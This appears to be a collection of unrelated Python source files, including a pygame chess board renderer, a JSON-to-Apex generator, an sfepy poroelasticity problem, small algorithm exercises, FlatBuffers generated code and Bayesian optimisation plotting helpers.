import pygame
import colors
from teams import *
import os
import exceptions
import logging
pygame.init()
SCREEN_WIDTH = pygame.display.Info().current_w
SCREEN_HEIGHT = pygame.display.Info().current_h - 50
HEIGHT_OF_SCOREBOARD = 200
SPACE_FROM_SCOREBOARD = 50
BOARD_SIDE = SCREEN_HEIGHT - HEIGHT_OF_SCOREBOARD - SPACE_FROM_SCOREBOARD * 2
MIDDLE_HORIZONTAL = SCREEN_WIDTH / 2
RECT_WIDTH = 200
RECT_HEIGHT = 100
NUMBER_OF_SMALL_RECTS = 4
SMALL_RECT_WIDTH = SCREEN_WIDTH/(NUMBER_OF_SMALL_RECTS*4)
SMALL_RECT_HEIGHT = SCREEN_HEIGHT/(NUMBER_OF_SMALL_RECTS*2)
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
squares = []
PICTURES_PATH = 'pictures'
NUMBER_OF_SQUARES = 8
SCORE_BOARD = pygame.Surface((SCREEN_WIDTH, HEIGHT_OF_SCOREBOARD))
REGULAR_FONT = pygame.font.SysFont('comicsansms', 30)
LARGE_FONT = pygame.font.Font('freesansbold.ttf', 80)
SPACE_BETWEEN_BOARD_AND_EATEN_PIECES = 100
GAME_LENGTH_OPTION = (1, 3, 5, 10)
LIGHT_SQUARE_COLOR = colors.LIGHT_BLUE
DARK_SQUARE_COLOR = colors.DARK_BLUE
class Square:
SIDE = BOARD_SIDE/NUMBER_OF_SQUARES
def __init__(self, x, y, color, tur, line):
self.rect = pygame.Rect(x, y, self.SIDE, self.SIDE)
self.color = color
self.original_color = color
self.tur_cord = tur
self.line_cord = line
self.id = str(line) + str(tur)
self.x_mid = x + Square.SIDE/2
self.y_mid = y + Square.SIDE/2
self.current_piece = None
def draw(self):
pygame.draw.rect(screen, self.color, self.rect)
if self.current_piece is not None:
self.current_piece.draw()
def coloring_square_by_original_color(self):
if self.color == self.original_color:
if self.original_color == DARK_SQUARE_COLOR:
self.color = colors.DARK_RED
else:
self.color = colors.LIGHT_RED
else:
self.color = self.original_color
def __str__(self):
return f'(line: {self.line_cord}, tur: {self.tur_cord})'
def add_squares_to_board():
    # At the beginning of the game, create and draw the board squares.
bg_image = pygame.image.load(os.path.join(PICTURES_PATH, 'main_background.jpg'))
screen.blit(bg_image, (0, HEIGHT_OF_SCOREBOARD))
x = SPACE_FROM_SCOREBOARD
y = HEIGHT_OF_SCOREBOARD + SPACE_FROM_SCOREBOARD
for line in range(NUMBER_OF_SQUARES):
tmp = line % 2
        line_of_squares = []
        for tur in range(NUMBER_OF_SQUARES):
            if tur % 2 == tmp:
                color = LIGHT_SQUARE_COLOR
            else:
                color = DARK_SQUARE_COLOR
            current_square = Square(x, y, color, tur, line)
            line_of_squares.append(current_square)
            x += Square.SIDE
        squares.append(line_of_squares)
x = SPACE_FROM_SCOREBOARD
y += Square.SIDE
pygame.display.flip()
def is_move_to_square_valid(tur, line, team):
if 0 <= line < NUMBER_OF_SQUARES and 0 <= tur < NUMBER_OF_SQUARES:
# Square is on the board
check_square_piece = squares[line][tur].current_piece
if check_square_piece is not None:
# Check if other piece is on the same team.
return team is not check_square_piece.team
# Next move is inside board and empty square.
return True
return False
def draw_bg(team_got_turn: Team, team_doesnt_got_turn: Team):
draw_scoreboard(team_got_turn, team_doesnt_got_turn)
draw_board()
def draw_scoreboard(team_got_turn: Team, team_doesnt_got_turn: Team):
white_team, black_team = get_teams_colors(team_got_turn, team_doesnt_got_turn)
screen.blit(SCORE_BOARD, (0, 0))
    # Fill the scoreboard with a solid color instead of a background image;
    # this also erases the previous frame's scoreboard before redrawing.
SCORE_BOARD.fill(colors.DARK_BLUE)
# bg_image = pygame.image.load(os.path.join(PICTURES_PATH, 'boardscore_bg.png'))
# SCORE_BOARD.blit(bg_image, (0, 0))
draw_who_turn_is(team_got_turn)
draw_timers(white_team, black_team)
draw_score(team_got_turn, team_doesnt_got_turn)
def draw_board():
for line in squares:
for square in line:
square.draw()
def draw_who_turn_is(team_got_turn):
if team_got_turn.is_white_team:
text = LARGE_FONT.render('White Player Turn', False, colors.WHITE)
else:
text = LARGE_FONT.render('Black Player Turn', False, colors.BLACK)
SCORE_BOARD.blit(text, (MIDDLE_HORIZONTAL - text.get_width()/2, 0))
def draw_timer(team):
timer = team.timer
color = colors.WHITE if team.is_white_team else colors.BLACK
minutes = timer.get_minutes_left()
seconds = timer.get_seconds_left_to_last_minute()
seconds = '00' if seconds == 60 else str(seconds).zfill(2)
minutes = str(minutes).zfill(2)
text = REGULAR_FONT.render(f"{minutes}:{seconds}", False, color)
place = (10, 0) if team.is_white_team else (SCORE_BOARD.get_width() - text.get_width(), 0)
SCORE_BOARD.blit(text, place)
def draw_timers(white_team, black_team):
draw_timer(white_team)
draw_timer(black_team)
def draw_score(team_got_turn, team_doesnt_got_turn):
white_team = team_got_turn if team_got_turn.is_white_team else team_doesnt_got_turn
black_team = team_got_turn if not team_got_turn.is_white_team else team_doesnt_got_turn
white_team.update_score()
black_team.update_score()
length = SCREEN_WIDTH - 20
text = REGULAR_FONT.render("White team score:", False, colors.WHITE)
SCORE_BOARD.blit(text, (0, SCORE_BOARD.get_height() - 15 - text.get_height()))
text = REGULAR_FONT.render("Black team score:", False, colors.WHITE)
SCORE_BOARD.blit(text, (SCREEN_WIDTH - text.get_width() - 10, SCORE_BOARD.get_height() - 15 - text.get_height()))
pygame.draw.rect(SCORE_BOARD, colors.BLACK, (10, SCORE_BOARD.get_height() - 15, length, 10))
white_rect_length = length / 2 + get_score_difference(white_team, black_team) / 10
pygame.draw.rect(SCORE_BOARD, colors.WHITE, (10, SCORE_BOARD.get_height() - 15, white_rect_length, 10))
def color_all_square_to_original_color():
for line in squares:
for square in line:
if square.color != square.original_color:
square.coloring_square_by_original_color()
def draw_eaten_pieces(white_team: Team, black_team: Team):
width, height = int(SCREEN_WIDTH - BOARD_SIDE - (SPACE_BETWEEN_BOARD_AND_EATEN_PIECES * 2)),\
int(white_team.pieces[0].image.get_height() + 5)
rect = pygame.Rect(BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES,
SCORE_BOARD.get_height() + (SPACE_FROM_SCOREBOARD*2), width, height)
pygame.draw.rect(screen, colors.DARK_BLUE, rect)
x = BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES
size = int(min(width / 16, white_team.pieces[0].image.get_height()))
for eaten_piece in white_team.eaten_pieces:
image = pygame.transform.scale(eaten_piece.image, (size, size))
screen.blit(image, (x, rect.top))
x += size
rect = pygame.Rect(BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES,
SCREEN_HEIGHT - (SPACE_FROM_SCOREBOARD*2) - height, width, height)
pygame.draw.rect(screen, colors.WHITE, rect)
x = BOARD_SIDE + SPACE_BETWEEN_BOARD_AND_EATEN_PIECES
for eaten_piece in black_team.eaten_pieces:
image = pygame.transform.scale(eaten_piece.image, (size, size))
screen.blit(image, (x, rect.top))
x += size
def draw_winner(team_won):
text = f"Team won is {team_won}"
logging.info(text)
text_surface = LARGE_FONT.render(text, False, colors.LIGHT_BLUE)
screen.blit(text_surface, (MIDDLE_HORIZONTAL - text_surface.get_width()/2, SCREEN_HEIGHT / 2 - text_surface.get_height()/2))
pygame.display.flip()
def draw_tie():
text = f"Tie"
text_surface = LARGE_FONT.render(text, False, colors.DARK_GREEN)
screen.blit(text_surface, (SCREEN_WIDTH / 2 - 50, SCREEN_HEIGHT / 2 - 30))
pygame.display.flip()
|
from json import loads
from utilities import *
from re import sub
from modules.constants import GEN_STARTERS, QUOTED_HELP_MSG, JSON_ERROR
# Entry point: turns a JSON string into the generated Apex code.
def getApexCode(inputJson):
apex = GEN_STARTERS
print( type(inputJson) )
try:
y = loads(inputJson)
except ValueError as err:
return JSON_ERROR
if type(y) is list:
apex += startingArray
if len(y) > 0 and (type(y[0]) is dict):
for i in y:
apex += startObject
apex += funToCheck(i)
apex += endObject
else:
listType = getListType(y)
values = str(y).replace("[", "").replace("]", "")
apex += writeObject("new List<" + listType + ">{" + values + "}")
apex += endingArray
elif type(y) is dict:
apex += startObject
apex += funToCheck(y)
apex += endObject
elif type(y) is str:
apex += writeString(y)
elif type(y) is int:
apex += writeNumber(y)
elif type(y) is bool:
apex += writeBoolean(y)
apex += ' return gen;\n'
return apex + '}'
# This method recursively generates the code
def funToCheck(j):
apex = ""
for x in j.keys():
if type(j.get(x)) is dict:
apex += writeFieldName(x)
apex += startObject
apex += funToCheck(j.get(x))
apex += endObject
elif type(j.get(x)) is list:
if len(j.get(x)) == 0:
apex += writeFieldName(x)
apex += startingArray
apex += endingArray
elif len(j.get(x)) > 0 and type(j.get(x)[0]) is dict:
apex += writeFieldName(x)
apex += startingArray
for i in j.get(x):
apex += startObject
apex += funToCheck(i)
apex += endObject
apex += endingArray
else:
listType = getListType(j.get(x))
if listType is not None:
values = str(j.get(x)).replace("[", "").replace("]", "")
apex += writeObjectField(x, "new List<" + listType + ">{" + values + "}")
elif type(j.get(x)) is str:
apex += writeStringField(x, str(j.get(x)))
elif type(j.get(x)) is int:
apex += writeNumberField(x, str(j.get(x)))
elif type(j.get(x)) is bool:
apex += writeBooleanField(x, str(j.get(x)))
elif j.get(x) is None:
apex += writeNullField(x)
return apex
def parseQuotedJson( jsonBody ):
jsonBody = jsonBody.strip()
if(jsonBody.startswith("'")):
jsonBody = jsonBody[1:]
if( jsonBody.endswith("'") ):
jsonBody = jsonBody[:-1]
    # Strip single quotes, '+' concatenation characters and spaces left over
    # from an Apex-style quoted string (note: this also removes spaces inside
    # string values).
    jsonBody = sub("['+ ]", "", jsonBody)
return jsonBody
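# A minimal usage sketch (illustrative only): assuming the helpers imported
# from `utilities` (writeStringField, writeNumberField, startObject, endObject,
# ...) and GEN_STARTERS behave as the code above expects, generating Apex for a
# quoted JSON payload could look like this. The sample string is made up.
if __name__ == '__main__':
    sample = """'{"name": "Ada", "age": 36}'"""
    print(getApexCode(parseQuotedJson(sample)))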
|
# ! This file exists entirely to load pytest plugins. Do not add anything else here.
pytest_plugins = [
"api_test_utils.fixtures",
]
|
r"""
Biot problem - deformable porous medium with the no-penetration boundary
condition on a boundary region.
Find :math:`\ul{u}`, :math:`p` such that:
.. math::
\int_{\Omega} D_{ijkl}\ e_{ij}(\ul{v}) e_{kl}(\ul{u})
- \int_{\Omega} p\ \alpha_{ij} e_{ij}(\ul{v})
= 0
\;, \quad \forall \ul{v} \;,
\int_{\Omega} q\ \alpha_{ij} e_{ij}(\ul{u})
+ \int_{\Omega} K_{ij} \nabla_i q \nabla_j p
= 0
\;, \quad \forall q \;,
\ul{u} \cdot \ul{n} = 0 \mbox{ on } \Gamma_{walls} \;,
where
.. math::
D_{ijkl} = \mu (\delta_{ik} \delta_{jl}+\delta_{il} \delta_{jk}) +
\lambda \ \delta_{ij} \delta_{kl}
\;.
"""
import os
import numpy as nm
from sfepy.linalg import get_coors_in_tube
from sfepy.mechanics.matcoefs import stiffness_from_lame
def define():
from sfepy import data_dir
filename = data_dir + '/meshes/3d/cylinder.mesh'
output_dir = 'output'
return define_input(filename, output_dir)
def cinc_simple(coors, mode):
axis = nm.array([1, 0, 0], nm.float64)
if mode == 0: # In
centre = nm.array([0.0, 0.0, 0.0], nm.float64)
radius = 0.019
length = 0.00002
elif mode == 1: # Out
centre = nm.array([0.1, 0.0, 0.0], nm.float64)
radius = 0.019
length = 0.00002
elif mode == 2: # Rigid
centre = nm.array([0.05, 0.0, 0.0], nm.float64)
radius = 0.015
length = 0.03
else:
raise ValueError('unknown mode %s!' % mode)
return get_coors_in_tube(coors,
centre, axis, -1, radius, length)
def define_regions(filename):
if filename.find('simple.mesh'):
dim = 3
regions = {
'Omega' : 'all',
'Walls' : ('vertices of surface -v (r.Outlet +f r.Inlet)', 'facet'),
'Inlet' : ('vertices by cinc_simple0', 'facet'),
'Outlet' : ('vertices by cinc_simple1', 'facet'),
'Rigid' : 'vertices by cinc_simple2',
}
else:
raise ValueError('unknown mesh %s!' % filename)
return regions, dim
def get_pars(ts, coor, mode, output_dir='.', **kwargs):
if mode == 'qp':
n_nod, dim = coor.shape
        # Number of independent components of a symmetric tensor (Voigt notation).
        sym = (dim + 1) * dim // 2
out = {}
out['D'] = nm.tile(stiffness_from_lame(dim, lam=1.7, mu=0.3),
(coor.shape[0], 1, 1))
aa = nm.zeros((sym, 1), dtype=nm.float64)
aa[:dim] = 0.132
aa[dim:sym] = 0.092
out['alpha'] = nm.tile(aa, (coor.shape[0], 1, 1))
perm = nm.eye(dim, dtype=nm.float64)
out['K'] = nm.tile(perm, (coor.shape[0], 1, 1))
return out
def post_process(out, pb, state, extend=False):
from sfepy.base.base import Struct
dvel = pb.evaluate('ev_diffusion_velocity.i.Omega( m.K, p )',
mode='el_avg')
out['dvel'] = Struct(name='output_data',
mode='cell', data=dvel, dofs=None)
stress = pb.evaluate('ev_cauchy_stress.i.Omega( m.D, u )',
mode='el_avg')
out['cauchy_stress'] = Struct(name='output_data',
mode='cell', data=stress, dofs=None)
return out
def define_input(filename, output_dir):
filename_mesh = filename
options = {
'output_dir' : output_dir,
'output_format' : 'vtk',
'post_process_hook' : 'post_process',
'ls' : 'ls',
'nls' : 'newton',
}
functions = {
'cinc_simple0' : (lambda coors, domain:
cinc_simple(coors, 0),),
'cinc_simple1' : (lambda coors, domain:
cinc_simple(coors, 1),),
'cinc_simple2' : (lambda coors, domain:
cinc_simple(coors, 2),),
'get_pars' : (lambda ts, coors, mode=None, **kwargs:
get_pars(ts, coors, mode,
output_dir=output_dir, **kwargs),),
}
regions, dim = define_regions(filename_mesh)
field_1 = {
'name' : 'displacement',
'dtype' : nm.float64,
'shape' : dim,
'region' : 'Omega',
'approx_order' : 1,
}
field_2 = {
'name' : 'pressure',
'dtype' : nm.float64,
'shape' : 1,
'region' : 'Omega',
'approx_order' : 1,
}
variables = {
'u' : ('unknown field', 'displacement', 0),
'v' : ('test field', 'displacement', 'u'),
'p' : ('unknown field', 'pressure', 1),
'q' : ('test field', 'pressure', 'p'),
}
ebcs = {
'inlet' : ('Inlet', {'p.0' : 1.0, 'u.all' : 0.0}),
'outlet' : ('Outlet', {'p.0' : -1.0}),
}
lcbcs = {
'rigid' : ('Outlet', {'u.all' : 'rigid'}),
'no_penetration' : ('Walls', {'u.all' : 'no_penetration'}),
}
material_1 = {
'name' : 'm',
'function' : 'get_pars',
}
integral_1 = {
'name' : 'i',
'order' : 2,
}
equations = {
'eq_1' :
"""dw_lin_elastic.i.Omega( m.D, v, u )
- dw_biot.i.Omega( m.alpha, v, p )
= 0""",
'eq_2' :
"""dw_biot.i.Omega( m.alpha, u, q )
+ dw_diffusion.i.Omega( m.K, q, p )
= 0""",
}
solver_0 = {
'name' : 'ls',
'kind' : 'ls.scipy_direct', # Direct solver.
}
solver_1 = {
'name' : 'newton',
'kind' : 'nls.newton',
}
return locals()
|
'''Write a program to accept a number and check and display whether it is a Niven Number or not.
A Niven number is a number that is divisible by the sum of its digits.
Input Format
a number
Constraints
n>0
Output Format
Yes or No
Sample Input 0
126
Sample Output 0
Yes
Sample Input 1
10
Sample Output 1
Yes'''
#solution
def niven(num):
summ = 0
for i in num:
summ += int(i)
return "Yes" if int(num) % summ == 0 else "No"
print(niven(input()))
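# Worked check for the first sample: the digits of 126 sum to 1 + 2 + 6 = 9,
# and 126 % 9 == 0, so the program prints "Yes". A purely arithmetic digit
# sum (no string iteration) is an alternative sketch of the same idea:
def digit_sum(n):
    total = 0
    while n > 0:
        total += n % 10
        n //= 10
    return total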
|
from database.base import Transfer
class TweetphotoTransfer(Transfer):
table_name = 'tweet_photo'
def process_origin(self):
datalist = []
origins = self.collection.find({'status': {'$ne': 'done'}})
# origins = self.collection.find()
if origins.count() > 0:
for one in origins:
print('id: %s' % one['_id'])
datalist.append(one)
return datalist
def start():
    print('------------------------------ TweetPhoto data transfer starting ---------------------------------')
TweetphotoTransfer().start()
|
"""
输入两个单调递增的链表,输出两个链表合成后的链表,当然我们需要合成后的链表满足单调不减规则
"""
class Node:
def __init__(self, value):
self.value = value
self.next = None
class Solution:
    def merge_linklists(self, head1, head2):
        # If either list is empty, the merged result is simply the other one.
        if head1 is None:
            return head2
        if head2 is None:
            return head1
        # Cursors over the two input lists.
        cur1 = head1
        cur2 = head2
        # Pick the head of the merged list: the node with the smaller value.
        if cur1.value >= cur2.value:
            newhead = cur2
            cur2 = cur2.next
        else:
            newhead = cur1
            cur1 = cur1.next
        # Cursor over the merged list.
        newcur = newhead
        # Append whichever cursor currently points at the smaller value.
while cur1 and cur2:
if cur1.value <= cur2.value:
newcur.next = cur1
newcur = newcur.next
cur1 = cur1.next
else:
newcur.next = cur2
newcur = newcur.next
cur2 = cur2.next
        # When the loop ends, at least one list is exhausted; append the remainder of the other.
if cur1:
newcur.next = cur1
else:
newcur.next = cur2
return newhead
if __name__ == '__main__':
node1 = Node(100)
node1.next = Node(200)
node1.next.next = Node(300)
node1.next.next.next = Node(400)
node2 = Node(1)
node2.next = Node(200)
node2.next.next = Node(600)
node2.next.next.next = Node(800)
s = Solution()
newcur = s.merge_linklists(node1, node2)
while newcur:
print(newcur.value)
newcur = newcur.next
|
#!/usr/bin/env python3
# Generate the appveyor.yml file used to specify which configurations Appveyor
# tests.
import yaml
MSVC_VERSIONS = [
{"num": 15, "year": 2017, "stds": ["c++17","c++latest"], "boost": "1_69_0"},
]
def get_msvc_nodes_for_version(version):
win32_base = {
"GENERATOR_NAME": "Visual Studio {0} {1}".format(version["num"], version["year"]),
"BOOST_VERSION": version["boost"]
}
win64_base = {
"GENERATOR_NAME": "Visual Studio {0} {1} Win64".format(version["num"], version["year"]),
"BOOST_VERSION": version["boost"]
}
# Appveyor currently runs their VS2017 builds on a different VM.
if version["num"] >= 15:
win32_base["APPVEYOR_BUILD_WORKER_IMAGE"] = "Visual Studio 2017"
win64_base["APPVEYOR_BUILD_WORKER_IMAGE"] = "Visual Studio 2017"
ret = []
if len(version["stds"]) > 0:
for std in version["stds"]:
win32 = win32_base.copy()
win64 = win64_base.copy()
win32["STD"] = std
win64["STD"] = std
ret += [win32, win64]
else:
ret = [win32_base, win64_base]
return ret
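# For the single MSVC_VERSIONS entry above this expands to four matrix nodes
# (Win32 and Win64 for each of "c++17" and "c++latest"), each carrying
# GENERATOR_NAME, BOOST_VERSION, STD and the VS2017 worker image. A small,
# illustrative self-check of that expansion (not used by the generator):
def check_msvc_expansion():
    nodes = get_msvc_nodes_for_version(MSVC_VERSIONS[0])
    assert len(nodes) == 2 * len(MSVC_VERSIONS[0]["stds"])
    assert all("STD" in node and "GENERATOR_NAME" in node for node in nodes)
    return nodes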
if __name__ == "__main__":
msvc_nodes = [get_msvc_nodes_for_version(version) for version in MSVC_VERSIONS]
# Flatten
msvc_nodes = [item for innerlist in msvc_nodes for item in innerlist]
yml = {
"platform": "x64",
"configuration": "Release",
"install": "git submodule update --init --recursive",
"environment": {
"matrix": msvc_nodes
},
"build_script": [
"mkdir build",
"cd build",
"cmake -G \"%GENERATOR_NAME%\" -DCMAKE_BUILD_TYPE=Release -DBOOST_ROOT=C:/Libraries/boost_%BOOST_VERSION% -DMANUALLY_SET_STANDARD_FLAGS=ON ..",
"cmake --build . --config \"Release\"",
"ctest --output-on-failure"
]
}
with open("appveyor.yml", "w") as yaml_file:
yaml_file.write("# This file is auto-generated by tools/generate-appveyor-yaml.py.\n\n")
yaml.dump(yml, yaml_file, default_flow_style=False)
|
# coding=utf-8
import mock
from nose.tools import assert_equal, assert_true
from dmapiclient import HTTPError
from ...helpers import BaseApplicationTest
import pytest
@pytest.mark.skipif(True, reason='gcloud out of scope')
@mock.patch('app.main.views.g_cloud.search_api_client')
class TestErrors(BaseApplicationTest):
def test_404(self, search_api_mock):
res = self.client.get('/g-cloud/service/1234')
assert_equal(404, res.status_code)
assert_true(
"Check you've entered the correct web "
"address or start again on the Digital Marketplace homepage."
in res.get_data(as_text=True))
assert_true(
"If you can't find what you're looking for, email "
"<a href=\"mailto:enquiries@digitalmarketplace.service.gov.uk?"
"subject=Digital%20Marketplace%20feedback\" title=\"Please "
"send feedback to enquiries@digitalmarketplace.service.gov.uk\">"
"enquiries@digitalmarketplace.service.gov.uk</a>"
in res.get_data(as_text=True))
def test_410(self, search_api_mock):
res = self.client.get('/digital-services/framework')
assert_equal(410, res.status_code)
assert_true(
"Check you've entered the correct web "
"address or start again on the Digital Marketplace homepage."
in res.get_data(as_text=True))
assert_true(
"If you can't find what you're looking for, email "
"<a href=\"mailto:enquiries@digitalmarketplace.service.gov.uk?"
"subject=Digital%20Marketplace%20feedback\" title=\"Please "
"send feedback to enquiries@digitalmarketplace.service.gov.uk\">"
"enquiries@digitalmarketplace.service.gov.uk</a>"
in res.get_data(as_text=True))
def test_500(self, search_api_mock):
self.app.config['DEBUG'] = False
api_response = mock.Mock()
api_response.status_code = 503
search_api_mock.search_services.side_effect = HTTPError(api_response)
res = self.client.get('/g-cloud/search?q=email')
assert_equal(503, res.status_code)
assert_true(
"Sorry, we're experiencing technical difficulties"
in res.get_data(as_text=True))
assert_true(
"Try again later."
in res.get_data(as_text=True))
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: Example
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class NestedStruct(object):
__slots__ = ['_tab']
# NestedStruct
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# NestedStruct
def A(self): return [self._tab.Get(flatbuffers.number_types.Int32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0 + i * 4)) for i in range(2)]
# NestedStruct
def ALength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(0))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def AIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(0))
return o == 0
# NestedStruct
def B(self): return self._tab.Get(flatbuffers.number_types.Int8Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# NestedStruct
def C(self): return [self._tab.Get(flatbuffers.number_types.Int8Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(9 + i * 1)) for i in range(2)]
# NestedStruct
def CLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(9))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def CIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(9))
return o == 0
# NestedStruct
def D(self): return [self._tab.Get(flatbuffers.number_types.Int64Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16 + i * 8)) for i in range(2)]
# NestedStruct
def DLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
if o != 0:
return self._tab.VectorLen(o)
return 0
# NestedStruct
def DIsNone(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16))
return o == 0
def CreateNestedStruct(builder, a, b, c, d):
builder.Prep(8, 32)
for _idx0 in range(2 , 0, -1):
builder.PrependInt64(d[_idx0-1])
builder.Pad(5)
for _idx0 in range(2 , 0, -1):
builder.PrependInt8(c[_idx0-1])
builder.PrependInt8(b)
for _idx0 in range(2 , 0, -1):
builder.PrependInt32(a[_idx0-1])
return builder.Offset()
try:
from typing import List
except:
pass
class NestedStructT(object):
# NestedStructT
def __init__(self):
self.a = None # type: List[int]
self.b = 0 # type: int
self.c = None # type: List[int]
self.d = None # type: List[int]
@classmethod
def InitFromBuf(cls, buf, pos):
nestedStruct = NestedStruct()
nestedStruct.Init(buf, pos)
return cls.InitFromObj(nestedStruct)
@classmethod
def InitFromObj(cls, nestedStruct):
x = NestedStructT()
x._UnPack(nestedStruct)
return x
# NestedStructT
def _UnPack(self, nestedStruct):
if nestedStruct is None:
return
if not nestedStruct.AIsNone():
if np is None:
self.a = []
for i in range(nestedStruct.ALength()):
self.a.append(nestedStruct.A(i))
else:
self.a = nestedStruct.AAsNumpy()
self.b = nestedStruct.B()
if not nestedStruct.CIsNone():
if np is None:
self.c = []
for i in range(nestedStruct.CLength()):
self.c.append(nestedStruct.C(i))
else:
self.c = nestedStruct.CAsNumpy()
if not nestedStruct.DIsNone():
if np is None:
self.d = []
for i in range(nestedStruct.DLength()):
self.d.append(nestedStruct.D(i))
else:
self.d = nestedStruct.DAsNumpy()
# NestedStructT
def Pack(self, builder):
return CreateNestedStruct(builder, self.a, self.b, self.c, self.d)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 27 23:22:32 2016
@author: Vu
"""
from __future__ import division
import numpy as np
#import mayavi.mlab as mlab
#from scipy.stats import norm
#import matplotlib as plt
from mpl_toolkits.mplot3d import Axes3D
from prada_bayes_opt import PradaBayOptFn
#from prada_bayes_opt import PradaBayOptBatch
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from matplotlib import gridspec
import random
from acquisition_functions import AcquisitionFunction, unique_rows
import os
from pylab import *
cdict = {'red': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.7),
(1.0, 1.0, 1.0)),
'green': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.0),
(1.0, 1.0, 1.0)),
'blue': ((0.0, 0.0, 0.0),
(0.5, 1.0, 0.0),
(1.0, 0.5, 1.0))}
#my_cmap = matplotlib.colors.LinearSegmentedColormap('my_colormap',cdict,256)
#my_cmap = plt.get_cmap('cubehelix')
my_cmap = plt.get_cmap('Blues')
counter = 0
#class Visualization(object):
#def __init__(self,bo):
#self.plot_gp=0
#self.posterior=0
#self.myBo=bo
def plot_bo(bo):
if bo.dim==1:
plot_bo_1d(bo)
if bo.dim==2:
plot_bo_2d(bo)
def plot_histogram(bo,samples):
if bo.dim==1:
plot_histogram_1d(bo,samples)
if bo.dim==2:
plot_histogram_2d(bo,samples)
def plot_mixturemodel(g,bo,samples):
if bo.dim==1:
plot_mixturemodel_1d(g,bo,samples)
if bo.dim==2:
plot_mixturemodel_2d(g,bo,samples)
def plot_mixturemodel_1d(g,bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
x_plot = np.linspace(np.min(samples), np.max(samples), len(samples))
x_plot = np.reshape(x_plot,(len(samples),-1))
y_plot = g.score_samples(x_plot)[0]
x_plot_ori = np.linspace(np.min(samples_original), np.max(samples_original), len(samples_original))
x_plot_ori=np.reshape(x_plot_ori,(len(samples_original),-1))
fig=plt.figure(figsize=(8, 3))
plt.plot(x_plot_ori, np.exp(y_plot), color='red')
plt.xlim(bo.bounds[0,0],bo.bounds[0,1])
plt.xlabel("X",fontdict={'size':16})
plt.ylabel("f(X)",fontdict={'size':16})
plt.title("IGMM Approximation",fontsize=16)
def plot_mixturemodel_2d(dpgmm,bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
dpgmm_means_original=dpgmm.truncated_means_*bo.max_min_gap+bo.bounds[:,0]
#fig=plt.figure(figsize=(12, 5))
fig=plt.figure()
myGmm=fig.add_subplot(1,1,1)
x1 = np.linspace(bo.scalebounds[0,0],bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0],bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
x_plot=np.c_[x1g.flatten(), x2g.flatten()]
y_plot2 = dpgmm.score_samples(x_plot)[0]
y_plot2=np.exp(y_plot2)
#y_label=dpgmm.predict(x_plot)[0]
x1_ori = np.linspace(bo.bounds[0,0],bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0],bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
CS_acq=myGmm.contourf(x1g_ori,x2g_ori,y_plot2.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
myGmm.scatter(dpgmm_means_original[:,0],dpgmm_means_original[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
myGmm.set_title('IGMM Approximation',fontsize=16)
myGmm.set_xlim(bo.bounds[0,0],bo.bounds[0,1])
myGmm.set_ylim(bo.bounds[1,0],bo.bounds[1,1])
myGmm.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_histogram_2d(bo,samples):
# convert samples from 0-1 to original scale
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
#fig=plt.figure(figsize=(12, 5))
fig=plt.figure()
myhist=fig.add_subplot(1,1,1)
myhist.set_title("Histogram of Samples under Acq Func",fontsize=16)
#xedges = np.linspace(myfunction.bounds['x1'][0], myfunction.bounds['x1'][1], 10)
#yedges = np.linspace(myfunction.bounds['x2'][0], myfunction.bounds['x2'][1], 10)
xedges = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 10)
yedges = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 10)
H, xedges, yedges = np.histogram2d(samples_original[:,0], samples_original[:,1], bins=50)
#data = [go.Histogram2d(x=vu[:,1],y=vu[:,0])]
#plot_url = py.plot(data, filename='2d-histogram')
# H needs to be rotated and flipped
H = np.rot90(H)
H = np.flipud(H)
# Mask zeros
Hmasked = np.ma.masked_where(H==0,H) # Mask pixels with a value of zero
# Plot 2D histogram using pcolor
myhist.pcolormesh(xedges,yedges,Hmasked)
myhist.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
myhist.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
def plot_histogram_1d(bo,samples):
samples_original=samples*bo.max_min_gap+bo.bounds[:,0]
fig=plt.figure(figsize=(8, 3))
fig.suptitle("Histogram",fontsize=16)
myplot=fig.add_subplot(111)
myplot.hist(samples_original,50)
myplot.set_xlim(bo.bounds[0,0],bo.bounds[0,1])
